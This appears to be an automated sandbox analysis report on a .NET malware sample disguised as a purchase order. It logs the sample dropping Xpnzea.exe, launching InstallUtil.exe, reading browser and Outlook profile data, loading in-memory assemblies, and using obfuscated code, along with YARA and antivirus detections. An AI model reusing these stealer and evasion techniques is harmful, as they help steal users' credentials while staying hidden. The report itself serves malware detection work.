                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeReversingLabs: Detection: 47%
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeVirustotal: Detection: 32%
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeFile read: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe "C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe"
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Xpnzea.exe "C:\Users\user\AppData\Roaming\Xpnzea.exe"
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Xpnzea.exe "C:\Users\user\AppData\Roaming\Xpnzea.exe"
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll, ntmarta.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, wtsapi32.dll, winsta.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, vaultcli.dll, wintypes.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003909000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1486633819.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.000000000304C000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1739735884.0000000003957000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003909000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1486633819.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.000000000304C000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1739735884.0000000003957000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp

                        Data Obfuscation

                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, F8VZVLUPkb76WPMZ4nC.cs.Net Code: Type.GetTypeFromHandle(BsT7LxEsYZUK6W2v1Rg.IPyYDtsMjk(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(BsT7LxEsYZUK6W2v1Rg.IPyYDtsMjk(16777259)),Type.GetTypeFromHandle(BsT7LxEsYZUK6W2v1Rg.IPyYDtsMjk(16777263))})
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, Importer.cs.Net Code: CalcStub
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, WrapperOrderSpec.cs.Net Code: TestIdentifier System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5db0000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5db0000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5db0000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5db0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5db0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                        Source: Yara matchFile source: 8.2.Xpnzea.exe.41e3250.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.Xpnzea.exe.4583250.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5d40000.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.41e3250.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1472676483.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1652064396.0000000004583000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1485671738.0000000005D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1708492205.00000000028F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1627992334.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1739735884.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO_9876563647-FLOWTRONIX (FT)UUE.exe PID: 2944, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Xpnzea.exe PID: 6876, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Xpnzea.exe PID: 4260, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C9E9ED push esi; iretd 0_2_05C9EAD1
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C9397B pushad ; retf 0_2_05C93981
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C97B7B push esp; retf 0_2_05C97B81
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CA2E68 push eax; retf 0005h0_2_05CA2E5D
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CA0358 push es; retf 0005h0_2_05CA0666
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CA0353 push es; retf 0005h0_2_05CA0666
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CA2B1B push eax; retf 0005h0_2_05CA2E5D
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CA2B20 push eax; retf 0005h0_2_05CA2E5D
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CC2020 pushfd ; retf 0_2_05CC2021
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05EE3278 push esi; iretd 0_2_05EE327E
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_06146E88 push E8000001h; iretd 0_2_06146E8D
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF397B pushad ; retf 6_2_05FF3981
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FFEA6D push esi; iretd 6_2_05FFEAD1
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06002EA7 push esp; retf 6_2_06002EA8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06022020 pushfd ; retf 6_2_06022021
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06022FD0 push es; ret 6_2_06023080
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0618E498 push es; ret 6_2_0618E4BC
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06190C12 push es; ret 6_2_06190C20
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0619C545 push 280619C1h; ret 6_2_0619C565
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0619C567 push 280619C1h; ret 6_2_0619C565
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06243278 push esi; iretd 6_2_0624327E
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_064A6E88 push E8000001h; iretd 6_2_064A6E8D
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A5397B pushad ; retf 8_2_05A53981
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A5EA09 push esi; iretd 8_2_05A5EAD1
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A62EA7 push esp; retf 8_2_05A62EA8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A82020 pushfd ; retf 8_2_05A82021
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BFC566 push 2805BFC1h; ret 8_2_05BFC565
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BFC54E push 2805BFC1h; ret 8_2_05BFC565
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05F06E88 push E8000001h; iretd 8_2_05F06E8D
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05F0160C push ds; ret 8_2_05F01613
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5b40000.10.raw.unpack, PWap1U04AlPoyGQsDeZ.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'bPo0ugy90I', 'NtProtectVirtualMemory', 'Ur7ro9OcsXC2RKBJi6c', 'K88BXWO10qKYUf3yq9U', 'mOF381OOeMyqMOZqDlZ', 'Kc3QtBOjgxeAxKTkvUc'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5b40000.10.raw.unpack, ynNqgx095QFM02puHhI.csHigh entropy of concatenated method names: 'gKr0j3r8M0', 'fTNRn6OlcWBZXoMcX3S', 'KnnTkaORWx7YQcKMFaH', 'avvix6OhQ4aQROyhZJJ', 'LHCpVhO7KjGwpBxcfPe', 'wsF3USOGjPhKkYTxShE', 'qccfNCOHcIOd44YGvwY', 'XUT5bqOB6RltAcpwAxP'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, YbtbwRfTA7fyO09OhuA.csHigh entropy of concatenated method names: 'MM6fQvNiqx', 'beYf6c700U', 'zRiUXA388P', 'mdEKmW8M753xnIot0JQ', 'qyCYWP8ZJApkaPF4X5e', 'qahk258pUCNocErde47', 'euPjIH82XPN1uTXb3dj', 'xaqFus8sEkk3acYEBCF', 't01S0r89BMGK7B6U39N'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'mxwpxmDFIAHainh6GA6'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, YQDstTf9femEJ9x9cNt.csHigh entropy of concatenated method names: 'a3FfroEFHR', 'fm1fPXaYKI', 'nlg36PjX8SADrhyCrrJ', 'Jlicyrj3SgjaQ6MsmG2', 'scVih3jJu1KNV84mZiQ', 'dEBO6fjdtZqbpMIZvgY', 'jtLHmijyHh4oBNK1Au5', 'QD74pnjkDK0KCIH48Yu', 'RoHDAvj0fbqNhjVAWXc', 'LQCFaCjV67hgAQpfBip'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, rrhUpcofcEqO10LIFK.csHigh entropy of concatenated method names: 'zj1KCsPJs', 'Qd1x3vwjK', 'BEV4wsT4H', 'Sg0LvolH2', 'BkiNru0C7', 'j4PrOZSlmkkqllWRIDt', 'SR1p2FSRfDoelEtMETM', 'ea69E4ShyXwSgbD3uLc', 'QRvm8vS5COLOWwSPg0V', 'qHWFNdSmPqPNnWxKddW'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, TG5YQkE1UNMCogsZgYE.csHigh entropy of concatenated method names: 'GSWEtp7aeF', 'PGuEY7yuGy', 'xOVEAfQhFQ', 'OiYE7aTlTJ', 'WukEGjw9H6', 'yJHElZbs8Y', 'odyEREiGnH', 'C5uEhRYcVK', 'E8qE5uSfiL', 'IjEEmFErGF'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, fcjVvPf1n2QJ60Xrj71.csHigh entropy of concatenated method names: 'Ps3fcQlM2i', 'RpjY0SjPB0ycHFjC7ao', 'bAttrBj1daLd81piuZG', 'AKBJ6rjO8K92Jsnu4mT', 'jep1XijcRKeRcf0F5Zd', 'gvdEbsjjgy2YjoZGn4P', 'BjLwWTj8UC1a5wVekcK', 'q1JPqYjDFRbyfDKefME', 'bdj1gFjS1Hf2sv01NDg', 'GD9T4ijrr3wgijvjfMN'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, Ht0fUkf5mEwcRHByegY.csHigh entropy of concatenated method names: 'GTBfgWRJwg', 'cWXfwnjC6I', 'OQZfCMQAAp', 'B5fXOy8KCb07EInjllC', 'QKxvDW8xTZHuSmBDZC2', 'IwAT5d8eoCxHoe77l3b', 'yYTeXV8NkNxqxijLgDo', 'IWxWMn8WMH1qDtCVKxy', 'G4s2Sh84ieYw0u8E3Qu', 'Wg0WIb8LC5T5bujnxGC'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, mdncvaUULXNL3o2WjuR.csHigh entropy of concatenated method names: 'pTaUEhDHNk', 'cXHUowl57u', 'zZcdVo87nLfNWb8ojDW', 'hBUQNq8GfeywZsEm1U1', 'PF6Xgt8lt7eIa2eScPo', 'CRCZvN8Yn2OCmEXBdb0', 'CQfDgv8AwwbqKjs38dx', 'tHhfYH8RMjoDlyf76ey', 'puHwUg8hfY29eOO2Ll2', 'GFX0Z585ejwynQC9wuO'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, brEOsqUJCHwuJec7GGu.csHigh entropy of concatenated method names: 'ajIUygUMXK', 'jbS3Rh81FM59BPxPxc0', 'uwPRjw8OiAMYHAKrwAD', 'KZA8sY8ct1Dx2pxL9RX', 'K90m5L8jRWkiYHTEwGy', 'j5Zwd388gq8QKrffo8R', 'qT3D1m8Dnl3fx1UP8vh', 'hsqSZ28rrtkycpfyHNG', 'Wt2bQR8PMyVXbP9m3L7'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, KQ0O62flygUOwwEtWBN.csHigh entropy of concatenated method names: 'JsUfhYJ7tV', 'bHqAcc8k7KcJCWxYsV3', 'da9lpD80XFTWWXKQUqC', 'dTj9U18VyOSPQJA4s4m', 'C1FhCb8imdb2qvTlLqC', 'a1Rdri8fPadUDfLWmlL', 'v7UGmk8U9Sw02F4ZRHe', 'R4fMpo8bwXNE0Yl3Ync', 'NdytHU8EJ76cjw3jAI2', 'R7E4Ud8dYxwyY4AcHWG'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, PWap1U04AlPoyGQsDeZ.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'bPo0ugy90I', 'NtProtectVirtualMemory', 'Ur7ro9OcsXC2RKBJi6c', 'K88BXWO10qKYUf3yq9U', 'mOF381OOeMyqMOZqDlZ', 'Kc3QtBOjgxeAxKTkvUc'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, ynNqgx095QFM02puHhI.csHigh entropy of concatenated method names: 'gKr0j3r8M0', 'fTNRn6OlcWBZXoMcX3S', 'KnnTkaORWx7YQcKMFaH', 'avvix6OhQ4aQROyhZJJ', 'LHCpVhO7KjGwpBxcfPe', 'wsF3USOGjPhKkYTxShE', 'qccfNCOHcIOd44YGvwY', 'XUT5bqOB6RltAcpwAxP'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, gBpZs3Ue6w5ef2oUcN3.csHigh entropy of concatenated method names: 'NSxUKr8nOT', 'bC2UqIDdbCWS1NLs6q6', 'Y4r9sQDydM3kaejRXnG', 'Tx16MODkPIsGBo3nl5H', 'nqy5ggD0RZPkbuiM1kv', 'vhCTmdDVPdmvXl4B9Kk', 'VIRh9nDiRuiqCMqb8Ud', 'CrOEGEDfPmTQjiraTvl', 'd6hf1FD3Jva8yKo8Kih', 'B25HSODJVE6FxgbSeiL'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, T8ZYbHUxb33ReWabDWG.csHigh entropy of concatenated method names: 'sh3U4s9VPx', 'lrmULF1ioh', 'WDSyuSDoVpYQHCIf2dw', 'rvM5UpDeMihgIkPD9fn', 'iaiU2pDNvl9Ns9rRYOe', 'XK9pMVDbj35T6mWoAhr', 'ryvcrODE5xsAyZ7KTxC', 'pRbwJ0DKrNpa56WFxIN', 'OcXVZdDxN1wpUPvrV0P', 'V4QSjZDWZ0pBukBMsqT'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, NCbdhHJWLiR24qNMBX0.csHigh entropy of concatenated method names: 'pygJLBurnm', 'Y8b83drcn0JhRDSVjuw', 'uV54GTrjdNC1HP4D3Ui', 'jHDFNrr8dOQHAha41Cu', 'R6gB8brDVDIxXfhOa9K', 'hLR0LkrqOFS4ao5tLuI', 'C4Ahlgrvo2XaJAaOf9k', 'xpPJVSrFEpVZNGfDmbq', 'EdZaFUrHHG53uJ6yHDJ', 'f3xHFrrBoJTOqIK5BMa'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, ePs1mBkcEyfJ8TAtT2T.csHigh entropy of concatenated method names: 'xQLk8S7L6n', 'PemkDNxYI0', 'i5QkqMcLug', 'cH31GD1OCMOChQDkuDw', 'fcp2Sa1cCUyl1fVlydu', 'suPsFP1jXaPAfRwnKIO', 'xStrDw18yVr42LIODZ8', 'IQkCop1POtsVyDnMpSI', 'yZEynD11IhcunvtC2Fr', 'ftsidO1DSZ9fLD2ONt5'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, Q2sg51Ukkc0H5RkMMtZ.csHigh entropy of concatenated method names: 'iVbUV44BKe', 'jTXUiRJJ1Q', 'IwIFHG8HYXp8sxDQ6C7', 'tku0A08B6Nii21IwVwC', 'LrjqNE8vUCHmerXR1T2', 'h1UuBj8FS9ls6XUDfxd', 'PZERw48nBSKIol3LZdi'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, V7s2ZpEgNJRPQQ0SkgY.csHigh entropy of concatenated method names: 'rvC4W9XpvL', 'x8r44T7tGc', 'iYn4L3quDR', 'PLH4uMthJQ', 'PFm4pUapL5', 'Evs42Hg3De', 'PcX4M2uBPH', 'nDMoxXoeW9', 'WLl4Z7Joa4', 'qjY4slZGwk'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, atSpPjfnFXMaVbP3paE.csHigh entropy of concatenated method names: 'upVfYHBjxL', 'syI0ZljRONTFox15fX6', 'EphTJwjhFR2MefG6Vd7', 'axlKavj5YFOFKY4dCIi', 'PXZhn8jmSNlo3GKEnGa', 'bBUgAIjgZiB1OcUTfnD', 'drHNAWjCDnFygMGTKEw', 'hJjfndjwENWGouWASYj', 'CXNZacjIoy5UI9RXOko', 'T9H94SjTMBMbrkQvRm7'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, F8VZVLUPkb76WPMZ4nC.csHigh entropy of concatenated method names: 'CnYHFBqLEAQf6lViakI', 'WYvgF2quU5Ard3fHsl8', 'sSxEy08lhp', 'wFVfUSqZgpbcJPM3jTV', 'gai3nFqsJjK5Rrx9sHF', 'aSRnkiq9dcvFBwi98k7', 'p33Dr5qSNDDK4cS4MaB', 'MSN0FmqrZpcEI03qPVH', 'hVMEENqPspVr7Y1x15G', 'ikdRQAq1NjkLqw8vs1M'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, jyHLig03GbeGTp1tgyp.csHigh entropy of concatenated method names: 'Lm80dQAohg', 'wpn0kqBnLi', 'LhE0VxpIfE', 'MSf0fLCjte', 'pR00UK0pr9', 'M8n0bw7CZV', 'wLH0EyybvB', 'wA50oNDWlU', 'M0N0eju0LM', 'ATt0NpTmc5'
